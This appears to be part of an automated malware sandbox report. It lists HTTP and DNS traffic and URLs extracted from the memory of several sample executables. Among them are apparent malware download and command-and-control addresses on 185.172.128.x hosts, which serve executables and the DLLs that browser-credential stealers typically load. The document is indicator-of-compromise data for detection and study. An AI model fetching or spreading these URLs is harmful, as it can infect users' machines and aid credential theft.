Source: global traffic	HTTP traffic detected: GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ping.php?substr=eight HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: note.padd.cn.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: svc.iolo.com
Source: global traffic	DNS traffic detected: DNS query: download.iolo.net

Source: unknown

HTTP traffic detected: POST /v2/track HTTP/1.1Content-Type: application/x-json-streamContent-Encoding: gzipHost: westus2-2.in.applicationinsights.azure.comContent-Length: 850Expect: 100-continueConnection: Keep-Alive

Source: u3bs.0.exe, 00000001.00000002.2975335845.00000000043E8000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe
Source: u3bs.0.exe, 00000001.00000002.2995019108.000000002A7E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe&
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exe00
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
Source: u3bs.0.exe, 00000001.00000002.2975209039.0000000004314000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllc
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dllQ
Source: u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
Source: u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dllb
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dllr
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll#
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll)
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll:
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpb530a5706ea79088c3d36b56fcb77release4d62687a42cd9519ca69bf
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	String found in binary or memory: http://download.iolo.net
Source: run.exe, run.exe, 00000005.00000002.2295837403.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000005.00000000.2239188364.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2727602802.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2649348113.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr	String found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	String found in binary or memory: http://google.com
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: MSBuild.exe, 0000000C.00000002.2979656703.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.dr	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.dr	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.dr	String found in binary or memory: http://sf.symcd.com0&
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp, u3bs.3.exe, 00000011.00000002.2974514605.000000000265B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
Source: u3bs.3.exe, 00000011.00000002.2974514605.0000000002686000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp, u3bs.3.exe, 00000011.00000002.2974514605.00000000026E2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: run.exe, 00000005.00000002.2297293359.0000000003B79000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005628000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E01000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.0000000005721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: u3bs.0.exe, u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: u3bs.0.exe, 00000001.00000002.2999981368.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
